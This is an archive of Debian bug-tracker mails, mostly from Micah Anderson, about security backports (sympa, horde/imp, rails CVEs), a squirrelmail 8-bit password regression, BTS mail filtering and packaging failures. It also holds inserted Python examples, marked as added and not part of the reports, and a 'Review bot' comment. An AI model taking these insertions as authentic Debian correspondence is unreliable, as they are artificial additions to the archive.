Description: Digital signature


Bug#678072: [Pkg-puppet-devel] Bug#678072: puppet-lint: fails to run

2012-06-19 Thread micah anderson
Holger Levsen hol...@layer-acht.org writes:

 severity 678072 serious
 thanks

 On Dienstag, 19. Juni 2012, John Eikenberry wrote:
 Running puppet-lint fails every time, with or without any arguments.  This
 coincided with a recent change of ruby to default to 1.9.1 instead of 1.8.
 The puppet-common package, which puppet-lint depends on, doesn't include
 support for 1.9.1.

 as ruby will default to 1.9 in wheezy this will make the package completely
 unusable, thus raising the severity.


According to https://github.com/rodjek/puppet-lint/issues/103 this
should work with 1.9.2; this patch doesn't appear in the Debian package
and looks pretty trivial. The reported issue seems to be pretty
different from what was reported in the upstream github though.

micah



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#675971: what should we be doing?

2012-06-18 Thread micah anderson

Is the situation that all users that are at 1.2.3-348 and older can
speak to each other and all users that are at 1.2.3-349 and greater can
speak to each other, but >=349 cannot speak to <=348 users?

If so, is the intended plan for everyone to bump up to >=349?

If that is true, at the very least this warrants a NEWS entry.

micah
-- 







Bug#666865: Unarchive: The problem still persists

2012-05-25 Thread micah anderson
Arno Töll a...@debian.org writes:

 Hi,

 On 24.05.2012 19:12, micah anderson wrote:
 Do you have a way of testing this? I've set up something that I believe
 should let the messages through based on the X-Loop header, but need to
 test that it is working.
 
 There was a mistake in what was done, but that has been fixed now.

 Well, basically I will reply to you through the BTS. If my message
 reaches you, the problem seems fixed (pretending you didn't whitelist me
 explicitly given I'm the only one to complain :).

It looks like this went through fine on my end. 

Shall we close the bug?

micah






Bug#666865: Unarchive: The problem still persists

2012-05-24 Thread micah anderson
Arno Töll a...@debian.org writes:
 Hello,

 reopening the bug as the problem still persists.

Do you have a way of testing this? I've set up something that I believe
should let the messages through based on the X-Loop header, but need to
test that it is working.

micah






Bug#666865: Unarchive: The problem still persists

2012-05-24 Thread micah anderson
micah anderson mi...@riseup.net writes:

 Arno Töll a...@debian.org writes:
 Hello,

 reopening the bug as the problem still persists.

 Do you have a way of testing this? I've set up something that I believe
 should let the messages through based on the X-Loop header, but need to
 test that it is working.

There was a mistake in what was done, but that has been fixed now.

micah






Bug#666865: bug mail bounces

2012-05-18 Thread micah anderson
Stefan Fritsch s...@sfritsch.de writes:

 Hi,

 I think the problem is that you can't match on the Sender or From 
 headers, because those remain unmodified for BTS mail. But BTS mail 
 seems to have

 X-Loop: ow...@bugs.debian.org

 and

 X-Debian-PR-Source: name-of-source-package

 Maybe you can match on either of those.

I can't think of any mailing list software that allows for matching on
headers to allow messages to the list. 

Seeing as it's not an uncommon scenario for group maintained packages to
use a mailing list for their communication, and receiving to the mailing
list bugs from the tracker is important, this restriction seems a
problem.
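
An added example, not part of this bug report or of any Debian tool: a narrow allow rule keyed on the two BTS headers named above (X-Loop and X-Debian-PR-Source) instead of admitting everything from the BTS mail server. The function names, the package set and the sample messages are constructed here.

```python
"""Allow rule for a list/role address that otherwise rejects unknown senders.

Matches on the X-Loop and X-Debian-PR-Source headers the BTS adds, so that
bug mail gets through without whitelisting the whole busoni.debian.org host.
Example code; not squirrelmail's, Debian's or any list manager's own logic.
"""
from email import message_from_string
from email.message import Message

# X-Loop value the BTS puts on its outgoing mail (shown obfuscated in the thread).
BTS_LOOP = "owner@bugs.debian.org"
# Assumption: the source packages whose bug mail this address should receive.
OUR_SOURCE_PACKAGES = {"libapache-mod-removeip"}


def bts_allows(msg: Message) -> bool:
    """True if msg looks like BTS mail about one of our packages.

    Both headers are trivially forgeable, so this is allow-list plumbing that
    keeps legitimate bug mail from bouncing, not proof that the sender is the
    BTS; spam filtering and any real sender authentication stay separate.
    """
    loops = {v.strip().lower() for v in msg.get_all("X-Loop", [])}
    if BTS_LOOP not in loops:
        return False
    source = (msg.get("X-Debian-PR-Source") or "").strip()
    return source in OUR_SOURCE_PACKAGES


def filter_messages(raw_messages):
    """Return [(subject, allowed)] for each RFC 822 text in raw_messages."""
    result = []
    for raw in raw_messages:
        msg = message_from_string(raw)
        result.append((msg["Subject"], bts_allows(msg)))
    return result


# Constructed samples: BTS mail about our package, a direct mail from a person
# (no X-Loop), and BTS mail about a package this address does not maintain.
SAMPLES = [
    "From: Someone <someone@example.org>\n"
    "X-Loop: owner@bugs.debian.org\n"
    "X-Debian-PR-Source: libapache-mod-removeip\n"
    "Subject: Bug#666865: via the BTS\n\n",
    "From: Someone <someone@example.org>\n"
    "Subject: direct mail, no X-Loop\n\n",
    "X-Loop: owner@bugs.debian.org\n"
    "X-Debian-PR-Source: some-other-package\n"
    "Subject: Bug#NNNNNN: other package\n\n",
]

if __name__ == "__main__":
    for subject, allowed in filter_messages(SAMPLES):
        print("%-5s %s" % ("allow" if allowed else "drop", subject))
```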







Bug#672893: security: private archives available to all

2012-05-14 Thread Micah Anderson
Package: sympa
Version: 6.0.1+dfsg-4
Severity: grave
Tags: security patch
Justification: user security hole

It is possible to open the archive management (arc_manage) page
for any list, even those set to only be available to members,
giving anyone the option to download the archive, or delete the
archive.

http://www.sympa.org/distribution/latest-stable/NEWS 

Patch for the version in stable:
https://sourcesup.renater.fr/scm/viewvc.php/branches/sympa-6.0-branch/wwsympa/wwsympa.fcgi.in?root=sympa&r1=6706&r2=7358&pathrev=7358

Please reference CVE-2012-2352 in any changelogs addressing this issue.

micah

System Information:
Debian Release: wheezy/sid
Architecture: amd64 (x86_64)

Kernel: Linux 3.2.0-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash






Bug#666865: Unarchive: The problem still persists

2012-05-06 Thread micah anderson
On Sun, 06 May 2012 12:17:04 +0200, Arno Töll a...@debian.org wrote:
 Hi Micah,
 
 On 06.05.2012 06:13, micah anderson wrote:
  What address is not working? I looked around for a canonical list of
  role addresses that should accept emails, but I couldn't find one, so I
  gathered as many as I could and added them.
 
 Policy says in §3.3: The email address given in the Maintainer control
 field must accept [..] non-spam mail from the bug-tracking system.

Yes, I am aware of that policy section that lacks any specifics.

 However, you don't as you are dropping mail from people who contact you
 through the BTS (i.e. not over explicit carbon copies).

I'm afraid I don't understand what that means. How do people contact me
through the BTS? If it's not through debb...@bugs.debian.org,
debb...@busoni.debian.org, nore...@release.debian.org,
ow...@bugs.debian.org, or ow...@busoni.debian.org then I do not
understand how an individual can contact a package's listed address
through the BTS. 

I'm sorry I must seem dense here, but perhaps you could provide me with
an example?

 This makes it impossible to contact you over the BTS. If you really
 think such sender restrictions make sense, you should at least make
 sure you do accept mail from people sent via the BTS, e.g. by
 whitelisting mail from the BTS mail server (busoni.debian.org).

I won't whitelist the entire BTS mail server, not without a more narrow
definition of where things are coming from. 

micah


-- 







Bug#666865: Unarchive: The problem still persists

2012-05-05 Thread micah anderson
On Sat, 05 May 2012 19:04:06 +0200, Arno Töll a...@debian.org wrote:
 Hello,
 
 reopening the bug as the problem still persists.

What address is not working? I looked around for a canonical list of
role addresses that should accept emails, but I couldn't find one, so I
gathered as many as I could and added them.

I've added:

d...@ftp-master.debian.org
debb...@bugs.debian.org 
debb...@busoni.debian.org
debian-bugs-d...@lists.debian.org
f...@debian.org 
instal...@ftp-master.debian.org
nore...@release.debian.org
ow...@bugs.debian.org 
ow...@busoni.debian.org 
ow...@packages.qa.debian.org
p...@qa.debian.org
q...@master.debian.org

but that isn't covering it, so I'd like to know what other one is
needed.

micah






Bug#660206: [debian-mysql] Bug#660206: This is a regression

2012-04-10 Thread micah anderson
On Mon, 09 Apr 2012 10:21:08 -0700, Clint Byrum cl...@fewbar.com wrote:
 Excerpts from micah anderson's message of Sun Apr 08 10:13:40 -0700 2012:
  severity 660206 serious
  thanks
  
  This is actually a regression, the only way to get things to work again
  is to downgrade package like such:
  
  apt-get install mysql-server-5.1=5.1.49-3 mysql-client-5.1=5.1.49-3
  mysql-common=5.1.49-3 mysql-server-core-5.1=5.1.49-3
  libmysqlclient16=5.1.49-3
  
  micah
  
 
 So, I'm not sure I agree that this is such a serious
 regression. 

I would agree that this is not a *very* serious regression, but it's a
regression nonetheless. In my opinion an unintended regression is not
suitable for release as a security upload and should be replaced as soon
as a fix becomes available.

 *lenny* shipped with rails 2.1.0. 1.2.6 was released in 2007, and is
 not supported in Debian at all. The referenced upstream bug talks about
 using client versions older than 4.1, which is basically ancient.

I agree. However, the reality is that the security upgrade brought in
unrelated changes to the security upgrade and caused unrelated software
to break.

 I'm not disputing that this is a regression introduced by the upstream
 jump to 5.1.61, but I don't know that it's worth downgrading and losing
 security updates for. Perhaps the client libraries should be updated to
 something that is still supported by upstream and/or Debian.

The two choices here are to either downgrade mysql, or to upgrade client
libraries. While it seems sensible to upgrade client libraries to a
newer supported version, one should not have to do that because of a
security upgrade of another package. That option takes you from the
realm of routine security maintenance into the much more serious realm
of migrating completely other software to new client libraries that
would require a significant architecture overhaul (I don't know how much
you know about rails, but the difference between 2.1 and 2.2 is not a
trivial minor release, but typically involves almost a complete
rewrite). During a maintenance window, when you are expecting to only
do an isolated security upgrade of a package, the last thing the
sysadmin who is performing the upgrade is going to do is to re-write
some other code to deal with a surprise regression in the security
package. 

So while I do agree with you that the 'right' thing to do is to get the
software updated to newer client libraries, rather than to have exposed
security holes, the reality is that until that can happen (and in one
case that I am dealing with, that re-write is in progress, but is 6
months out) I would hope that stable-security or a stable update would
include a fix to this regression, when it comes available. 

micah

-- 







Bug#666865: libapache-mod-removeip: Maintainer address does not accept mail from role accounts

2012-04-02 Thread micah anderson


 The maintainer address you added to your package does not accept mail
 from role accounts, including but not limited to the bug tracking
 system. This is a policy violation as of §3.3: The email address given
 in the Maintainer control field must accept mail from those role
 accounts in Debian used to send automated mails regarding the package.
 This includes non-spam mail from the bug-tracking system, all mail from
 the Debian archive maintenance software, and other role accounts or
 automated processes that are commonly agreed on by the project.

Thanks, I've updated the allow list. Unfortunately there doesn't seem
to be a good canonical list of the aliases that are needed; it would be
a good idea to have that so people can properly follow policy.

micah





Bug#659392: Some information

2012-02-15 Thread micah anderson
On Tue, 14 Feb 2012 19:22:29 -0500, micah anderson mi...@riseup.net wrote:
 CVE-2012-0791 has a simple changeset:

Sorry, I switched these CVE issues, this one is actually CVE-2012-0909

 https://github.com/horde/horde/commit/208eae43c95136a67104f760027a8892a22b6e25
 
 it touches two files: 
 framework/Form/lib/Horde/Form/Type.php
 framework/Form/package.xml
 
 neither of these files is in horde3 or imp4 that is in Squeeze.
 
 For the other issue CVE-2012-0909, that seems to affect Squeeze's IMP,

this one is actually CVE-2012-0791.

 and a changeset between version 4.3.10 and 4.3.11 was published here:
 http://ftp.horde.org/pub/imp/patches/patch-imp-h3-4.3.10-h3-4.3.11.gz
 
 Squeeze has 4.3.7 - I've looked at the changeset above with a co-worker
 and it does not look too hard to port to the debian version. We'll do so
 in the next couple of days if nobody else does first.

have a patch, testing it now.






Bug#659392: Info received (debdiff)

2012-02-15 Thread micah anderson

On Wed, 15 Feb 2012 13:57:55 -0500, micah mi...@algae.riseup.net wrote:
 
 Attached is a debdiff against the squeeze version to fix imp4.

I forgot to mention that I've built a package off of this diff and
tested it and it seems to work fine (I have no way of testing that the
XSS issue is fixed).

micah






Bug#659392: Some information

2012-02-14 Thread micah anderson

I've been trying to figure out if this issue affects stable.

The issues point to this openwall post:
http://www.openwall.com/lists/oss-security/2012/01/22/2

which has actual git commits for things.

CVE-2012-0791 has a simple changeset:

https://github.com/horde/horde/commit/208eae43c95136a67104f760027a8892a22b6e25

it touches two files: 
framework/Form/lib/Horde/Form/Type.php
framework/Form/package.xml

neither of these files is in horde3 or imp4 that is in Squeeze.

For the other issue CVE-2012-0909, that seems to affect Squeeze's IMP,
and a changeset between version 4.3.10 and 4.3.11 was published here:
http://ftp.horde.org/pub/imp/patches/patch-imp-h3-4.3.10-h3-4.3.11.gz

Squeeze has 4.3.7 - I've looked at the changeset above with a co-worker
and it does not look too hard to port to the debian version. We'll do so
in the next couple of days if nobody else does first.

micah


-- 





Bug#657942: frei0r-plugins: Cannot install

2012-01-29 Thread Micah Anderson
Package: frei0r-plugins
Version: 1.1.22git20091109-1.1
Severity: serious

It's impossible to install this package.

The following packages have unmet dependencies:
 frei0r-plugins : Depends: libcvaux2.1 but it is not installable
  Depends: libhighgui2.1 but it is not installable

-- System Information:
Debian Release: wheezy/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.0.0-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages frei0r-plugins depends on:
ii  libc6  2.13-24
ii  libcv2.1   2.1.0-7+b2
ii  libcvaux2.1none
ii  libgavl1   none
ii  libgcc11:4.6.2-12
ii  libhighgui2.1  none
ii  libstdc++6 4.6.2-12

frei0r-plugins recommends no packages.

frei0r-plugins suggests no packages.






Bug#653107: Should this package be removed?

2011-12-24 Thread micah anderson
On Fri, 23 Dec 2011 23:40:20 +0100, Moritz Muehlenhoff j...@debian.org wrote:
 Package: util-vserver
 Severity: serious
 
 util-vserver hasn't seen an upload in 1.5 years and vserver support
 has been dropped from the Debian kernels post-Squeeze.
 
 Should util-vserver be removed as well?

I'm not sure. Before the kernel team started providing vserver kernels,
I was providing a kernel source patch set, which still requires the
user-space utilities to exist. 

I haven't decided if I will do that again, it depends on lxc maturing
enough to be a usable alternative, which so far it has not and until it
does, I'm not convinced that vservers should go away in debian.







Bug#629998: Conflicting st binary name

2011-09-26 Thread micah anderson

Hi,

It was written:

  
 We're also tossing around changing the OpenStack 'st' to
 'swiftly'. Whatever it becomes, it'll likely happen in our next
 release, 1.4.1. 

It appears that 1.4.3 is the latest version, with 1.4.4 coming. Did this
rename happen, and if so, can we resolve this issue (perhaps by
uploading a new version?)

thanks!
micah

ps - thanks for your work on this project, and zigo for the packaging!

-- 





Bug#629998: Conflicting st binary name

2011-09-26 Thread micah anderson
On Mon, 26 Sep 2011 23:33:50 +0800, Thomas Goirand tho...@goirand.fr wrote:
 On 09/26/2011 10:43 PM, Gregory Holt wrote:
  Yes, the rename did happen: st -> swift
  
  I'm not sure who/how the Debian packaging for OpenStack Swift is
  handled, but I expect they're listed on this bug so probably got emailed.
 
 Hi,
 
 I have seen that Glance and Swift are now released (code name Diablo,
 version 2011.3 for Glance, and 1.4.4 for Swift).
 
 I have seen that both Glance and Swift seem ok for an upload, but I
 want to do functional testing of them before the upload, and for the
 moment, Nova fails with its unit tests. So please bear with me and allow
 a bit more of time, so that I can make my tests before the uploads.

Seems reasonable!

 FYI, OpenStack got released last Friday, and I'm only discovering what's
 new in this release. It's not exactly a very simple thing, so it may
 take some time until I can upload.

Oh wow, I had no idea it was just released! I didn't mean to pressure
you :)

 Also, there's now an Alioth project for it, and I'd be very happy to
 have help on releasing this new version in Debian.

I can't commit to helping there now, I'm trying to get rid of some
commitments now because I am overextended. Depending on how that goes,
and if we decide to use OpenStack, I will keep that in mind!

thanks again for your work on this, it's very much appreciated!

micah




Bug#614864: ping?

2011-03-17 Thread micah anderson

Hi folks,

This security issue really needs to be dealt with. I'm concerned that we
are getting close to one month from when the bug was first reported to
the BTS; we are already over one month from when the bug was reported
upstream.

I'm looking for any feedback on the work I did...

micah

-- 





Bug#614864: patch

2011-03-04 Thread micah anderson

Hi, 

I decided to help a little bit moving these issues forward. I did what I
could, but now the more experienced debian rails people need to act. In
particular, there is a decision that needs to be made for CVE-2011-0446,
and a review of the fix I did for CVE-2011-0447. I am happy to help
facilitate in any other way, but I need others who have more experience
to weigh in on those.

Both of these CVEs affect all versions of rails, including those in
oldstable.

CVE-2011-0446
-

Patch for rails 2.3 to fix CVE-2011-0446 is here:

http://rubyonrails-security.googlegroups.com/attach/365b8a23b76a6b4a/2-3-mailto.patch?part=3

The upstream commit id is: abe97736b8316f1b714cac56c115c0779aa73217

Looking through the commit log for the above fix, it was done to rails
2.3.11, which has had three other commits that touched
actionpack/lib/action_view/helpers/url_helper.rb, the largest one is
9ca6df83f606a0fb8be3815328111d0cdaa7c65b which backports html_safe and
the latest rails_xss plugin. This change seems to be a pre-requisite for
the security fix, the sad thing is that it is a big change.

I did not do anything with CVE-2011-0446 as it was intrusive, hopefully
others who have experience with this package can weigh in on the best
way forwards with this one. Once this is resolved a security release
could happen.


CVE-2011-0447
-

The patch for rails 2.1 to fix CVE-2011-0447 is here:

http://rubyonrails-security.googlegroups.com/attach/c22ea1668c0d181c/2-1-csrf.patch?part=3

I was able to cherry-pick this commit
(d622353dd399908770473d417ecef028524b8c8b) from upstream's git repo into
the debian debian-lenny branch without any conflicts. I went ahead and
did that and have committed it, along with a changelog entry and a NEWS
entry that comes straight from the mailing list.

It is my opinion that the fix for lenny in 2.1 is done. Please someone
who has more skills in rails review this to make sure it is good, and
then I think it can be uploaded after contacting the security team.


The patch for rails 2.3 to fix CVE-2011-0447 is here:

http://rubyonrails-security.googlegroups.com/attach/c22ea1668c0d181c/2-3-csrf.patch?part=5

I was able to cherry-pick this commit
(9998f79b9cf9c60b07baf4c23a02178034e06d85) from upstream's git repo into
the debian v2.3-stable branch without any conflicts. I also went ahead
and committed this change, along with a changelog entry and a NEWS entry
that came from the mailing list, identical to the debian-lenny 2.1 one
above. 

Once CVE-2011-0446 has been resolved for 2.3, then this can be uploaded.

A few notes:

1. I noticed that the upload that made it into squeeze was never tagged
as debian/2.3.5-1.2, so I went ahead and did that.

2. I wasn't sure what the difference between the branch 'debian-lenny'
and v2.1-stable were. The 'debian-lenny' one seemed to have the most
recent security fixes, and had a debian directory, so I went with that
one.

3. v2.3-stable seemed to be the place for squeeze fixes, which differs
from the nomenclature used in #2, perhaps that fix should be in a
debian-squeeze branch? If so, then please change it, and clarify #2 for
v2.3-stable too.


Micah






Bug#603882: util-vserver: startup script breaks boot (on sparc)

2010-11-18 Thread micah anderson
On Thu, 18 Nov 2010 04:13:20 +0100 (CET), Daniel Hokka Zakrisson 
dan...@hozac.com wrote:

 What dietlibc version was used to build the binaries? Does it have
 http://people.linux-vserver.org/~dhozac/p/m/delta-dietdirent-fix01.diff
 applied? IIRC this was one way that problem exhibited itself.

Looking at the build logs for sparc, it looks like 0.32-5 of dietlibc
was used. Looking at the debian source for that version of dietlibc, and
comparing it to the patch you reference, no it was not applied.

That patch is odd, all it does is move the int below the 

char buf[PAGE_SIZE-(sizeof (int)*3)];

what is going on there?

micah




Bug#603882: util-vserver: startup script breaks boot (on sparc)

2010-11-18 Thread micah anderson
On Thu, 18 Nov 2010 04:13:20 +0100 (CET), Daniel Hokka Zakrisson 
dan...@hozac.com wrote:

 What dietlibc version was used to build the binaries? Does it have
 http://people.linux-vserver.org/~dhozac/p/m/delta-dietdirent-fix01.diff
 applied? IIRC this was one way that problem exhibited itself.

Actually, I lied. The patch *is* applied. I was looking at the unpatched
source, but if I looked at the patched source before it's built, it is in
fact there.

micah




Bug#600206: libcompass-ruby: compass apparently completely broken

2010-11-16 Thread micah anderson
On Tue, 16 Nov 2010 15:18:56 +0530, Deepak Tripathi dee...@debian.org wrote:
 Hi Steve,
 
 Sorry for the delay; I was on vacation to India (Raj).
 
 Yes actually popcon is very low for libcompass-ruby but i will still discuss
 with Micah Anderson mi...@debian.org who is the primary maintainer for
 this module and will update about his thought to the bug reports asap.

I don't mind it being removed from testing.

micah




Bug#593465: Please try

2010-10-22 Thread micah anderson
On Thu, 21 Oct 2010 13:15:58 +0200 (CEST), Jan Kontze kon...@ub.fu-berlin.de 
wrote:
 
 Hi Micah,
 
 
 I Wrote:
 
  Hi Micah!
   Hi, I just posted a follow-up to the Debian bug you reported about the
   squirrelmail security regression. I neglected to CC you, so you probably
   didn't know about it. But could you have a look and try the fixed
   package that I've uploaded and then report back to the bug report?
   For your convenience, I'm speaking of this one:
   http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=593465
   thanks!
   micah
  Yes, your fix (gotten from:
  http://people.debian.org/~micah/squirrelmail_1.4.15-4+lenny4_all.deb)
  seems to solve the problem with 8-bit char passwords in my setup - I could
  log in without problem into squirrelmail with such a password.
  Thank you a lot! :-)
 
 the new package seems to have a negative side effect: the search via
 squirrelmail now gives an error and yields no results any more.

What I see is this when I search:

ERROR: Could not complete request.
Query: FETCH (FLAGS UID RFC822.SIZE INTERNALDATE BODY.PEEK[HEADER.FIELDS (Date 
To Cc From Subject X-Priority Importance Priority Content-Type)])
Reason Given: Error in IMAP command received by server.

Is that the same as you?

micah




Bug#593465: found where function was added upstream

2010-10-19 Thread Micah Anderson

I looked at the SM upstream source for their SM-1_4-STABLE branch, and
found that they added this function Mon Jul 27, 2009, as evidenced here:

http://squirrelmail.svn.sourceforge.net/viewvc/squirrelmail/branches/SM-1_4-STABLE/squirrelmail/functions/imap_general.php?r1=13733&r2=13789

Considering that the version of SM that is in Lenny was uploaded in
December of 2008, the sqimap_run_literal_command would not have been
there thus would need to be added for the security update.

It looks like the update that Thijs prepared[0] added that function. Why
it doesn't work is what needs to be determined.

micah


0. http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=593465#10

-- 





Bug#593465: tried the fix too

2010-10-19 Thread Micah Anderson

I tried the fixed package too, and I got the same error as reported by
Jan Kontze. I'm running courier imapd from Lenny, and perdition. 

I looked at the fix some more on the SM websvn, and I think I found a
missing hunk that was applied at the same time the security fix was, but
is *not* in the debian package:

216a218,221
   {
   $response = 'OK';
   break 2;
   }
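
Review bot: the hunk `216a218,221` is in normal (ed-style) diff form and carries only the four added lines, so neither the `switch`/loop that `break 2` exits nor the condition under which `$response = 'OK'` is set can be checked from the patch alone; please attach the change as a unified diff (`diff -u`) with a few lines of context, or name the exact upstream revision it was taken from, so reviewers can confirm the lines land in the response-handling path that `sqimap_run_literal_command` depends on. The `> ` markers that normal diff puts in front of added lines also appear to have been lost in transit, so the hunk will not apply with `patch` as pasted.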

I just applied that on top of Thijs' fixed package, and then attempted
to login with a user with an 8-bit character in their password, and it
worked. I think that if this hunk was added along with the missing
function that was included in Thijs' package, it should solve the
regression. 

micah
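
The two failure modes discussed in this thread (the "Error in IMAP command received by server" response, and logins that only work once the literal-handling function is present) both come from how a password with 8-bit characters has to be sent under RFC 3501. The added example below, which is not squirrelmail's or Debian's code, shows a quoted-string versus literal LOGIN and the '+' continuation handling the literal form needs; the function names and the in-memory StubImapServer are constructed for this illustration.

```python
"""Why an 8-bit password must be sent as an IMAP literal, and the continuation
exchange a literal-aware LOGIN needs.  Example code with hypothetical names;
StubImapServer is a constructed stand-in, not a real IMAP server."""


def imap_string(value: str):
    """Encode one IMAP argument.

    Returns (head, literal).  head goes on the command line; literal is the
    payload sent only after the server's '+' continuation, or None when a
    quoted string suffices.  RFC 3501 quoted strings may not contain CR, LF
    or any 8-bit octet and must escape '"' and '\\'.
    """
    raw = value.encode("utf-8")
    if all(0x20 <= b < 0x7F for b in raw):
        quoted = raw.replace(b"\\", b"\\\\").replace(b'"', b'\\"')
        return b'"' + quoted + b'"', None
    return b"{%d}" % len(raw), raw   # literal: octet count, then the bytes


def build_login(tag: bytes, user: str, password: str, use_literals=True):
    """Split a LOGIN into chunks: chunks[0] is sent at once, each later chunk
    is a literal payload that may only follow a '+' continuation.  With
    use_literals=False the raw 8-bit bytes are stuffed into a quoted string,
    which is the broken behaviour behind the regression."""
    chunks = [tag + b" LOGIN"]
    for value in (user, password):
        if use_literals:
            head, literal = imap_string(value)
        else:
            head, literal = b'"' + value.encode("utf-8") + b'"', None
        chunks[-1] += b" " + head
        if literal is not None:
            chunks[-1] += b"\r\n"
            chunks.append(literal)
    chunks[-1] += b"\r\n"
    return chunks


def tagged_status(tag: bytes, line: bytes) -> str:
    """Return the status word (OK/NO/BAD) of a tagged response line."""
    if not line.startswith(tag + b" "):
        raise ValueError("expected tagged response, got %r" % line)
    return line.split(b" ", 2)[1].decode("ascii")


def login(server, tag: bytes, user: str, password: str, use_literals=True):
    """Drive the LOGIN exchange against `server` (send()/readline())."""
    chunks = build_login(tag, user, password, use_literals)
    server.send(chunks[0])
    for literal in chunks[1:]:
        line = server.readline()
        if not line.startswith(b"+"):
            # No continuation: the server rejected the command line itself.
            return tagged_status(tag, line)
        server.send(literal)
    while True:
        line = server.readline()
        if line.startswith(b"* "):   # untagged data: ignore it here
            continue
        return tagged_status(tag, line)


class StubImapServer:
    """Constructed stand-in that enforces just enough RFC 3501 syntax for
    this example; it is not an IMAP implementation."""

    def __init__(self, user: str, password: str):
        self.creds = (user.encode("utf-8"), password.encode("utf-8"))
        self.pending = []        # bytes of the command received so far
        self.replies = []
        self.saw_literal = False

    def send(self, data: bytes):
        self.pending.append(data)
        tag = self.pending[0].split(b" ", 1)[0]
        if data.endswith(b"}\r\n"):          # line ends with a literal header
            self.saw_literal = True
            self.replies.append(b"+ Ready for literal data\r\n")
            return
        command, self.pending = b"".join(self.pending), []
        if any(b >= 0x80 for b in command) and not self.saw_literal:
            # 8-bit octets inside a quoted string: the syntax error that the
            # thread reports as "Error in IMAP command received by server".
            self.replies.append(tag + b" BAD Error in IMAP command received by server.\r\n")
        elif all(c in command for c in self.creds):
            self.replies.append(tag + b" OK LOGIN completed\r\n")
        else:
            self.replies.append(tag + b" NO Login failed\r\n")
        self.saw_literal = False

    def readline(self) -> bytes:
        return self.replies.pop(0)


if __name__ == "__main__":
    for use_literals in (False, True):
        srv = StubImapServer("alice", "pässword")
        print("literals" if use_literals else "quoted  ",
              login(srv, b"A1", "alice", "pässword", use_literals))
```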


-- 





Bug#593465: Try this fixed package

2010-10-19 Thread Micah Anderson

I've uploaded a package that includes my fix, it seems to be working
well for me. If other people on this bug report can try it to see if it
works for them, that would be helpful.

you can get the package here:

http://people.debian.org/~micah/squirrelmail_1.4.15-4+lenny4_all.deb

note: source packages are in the same directory.

micah

-- 





Bug#598074: additionally produces this error

2010-09-26 Thread Micah Anderson

r...@nuthatch:~# /etc/init.d/ipsec stop
Stopping strongSwan IPsec failed: starter is not running
/etc/init.d/ipsec: line 96: return: : numeric argument required

micah






Bug#595432: perdition: Missing dependency: make

2010-09-03 Thread Micah Anderson
Package: perdition
Version: 1.17.1-2
Severity: serious
Justification: Policy 3.5

I tried to install my backport of perdition onto my lenny box and got this:

(Reading database ... 36581 files and directories currently installed.)
Preparing to replace perdition 1.17.1-2 (using 
perdition_1.19~rc3-1~bpo50+1_i386.deb) ...
/var/lib/dpkg/info/perdition.prerm: line 6: make: command not found

Unpacking replacement perdition ...
dpkg: error processing perdition (--install):
 dependency problems - leaving unconfigured
Processing triggers for man-db ...
Errors were encountered while processing:
 perdition

hrm, looks like perdition requires make in the postinst. Perhaps this could be 
fixed in a point release?

-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.32-5-686 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash






Bug#587913: libcompass-ruby: package broken

2010-07-05 Thread micah anderson
tag 587913 +moreinfo
tag 587913 +unreproducible
severity 587913 normal
thanks

On Fri, 02 Jul 2010 18:00:30 +0200, Christophe Moille whil...@doomfr.com 
wrote:
 Package could not be installed. 
 
 The following information may help to resolve the situation:

Can you provide more information about how your apt preferences/policies
and sources are set up? You seem to be running a mixed stable/testing
environment? 

I have no problem installing.

 The following packages have unmet dependencies:
   libcompass-ruby: Depends: libcompass-ruby1.8 but it is not going to be 
 installed
Depends: libfssm-ruby but it is not going to be installed

This doesn't happen to me, instead it looks like this to me:

algae:/home/micah# apt-get install libcompass-ruby
Reading package lists... Done
Building dependency tree   
Reading state information... Done
The following extra packages will be installed:
  libcompass-ruby1.8 libfssm-ruby
The following NEW packages will be installed:
  libcompass-ruby libcompass-ruby1.8 libfssm-ruby
0 upgraded, 3 newly installed, 0 to remove and 1 not upgraded.
Need to get 402kB of archives.
After this operation, 1,790kB of additional disk space will be used.
Do you want to continue [Y/n]? 
Get:1 http://debian.lcs.mit.edu sid/main libcompass-ruby1.8 0.8.17debian-1 
[385kB]
Get:2 http://debian.lcs.mit.edu sid/main libfssm-ruby 0.1.4-2 [3,060B]
Get:3 http://debian.lcs.mit.edu sid/main libcompass-ruby 0.8.17debian-1 [13.1kB]
Fetched 402kB in 0s (705kB/s)   
Selecting previously deselected package libcompass-ruby1.8.
(Reading database ... 299065 files and directories currently installed.)
Unpacking libcompass-ruby1.8 (from 
.../libcompass-ruby1.8_0.8.17debian-1_all.deb) ...
Selecting previously deselected package libfssm-ruby.
Unpacking libfssm-ruby (from .../libfssm-ruby_0.1.4-2_all.deb) ...
Selecting previously deselected package libcompass-ruby.
Unpacking libcompass-ruby (from .../libcompass-ruby_0.8.17debian-1_all.deb) ...
Setting up libcompass-ruby1.8 (0.8.17debian-1) ...
Setting up libfssm-ruby (0.1.4-2) ...
Setting up libcompass-ruby (0.8.17debian-1) ...
algae:/home/micah#






Bug#577366: [Pkg-puppet-devel] Bug#577366: Bug#577366: puppet: FTBFS: install: invalid user `puppet'

2010-04-18 Thread micah anderson
On Fri, 16 Apr 2010 14:23:25 +1000, Andrew Pollock apoll...@debian.org wrote:
 On Sun, Apr 11, 2010 at 10:15:14AM +0200, Lucas Nussbaum wrote:
   install -Dp -m0644 -o puppet -g puppet ext/rack/files/config.ru \
 
   /build/user-puppet_0.25.4-3-amd64-zxBvTe/puppet-0.25.4/debian/puppetmaster/usr/share/puppet/rack/puppetmasterd
   install: invalid user `puppet'
   make: *** [install] Error 1
  
 
 Looks like this was introduced in commit
 93a3ed1e3b70fe394f7ac96c235d527347ad57d2.
 
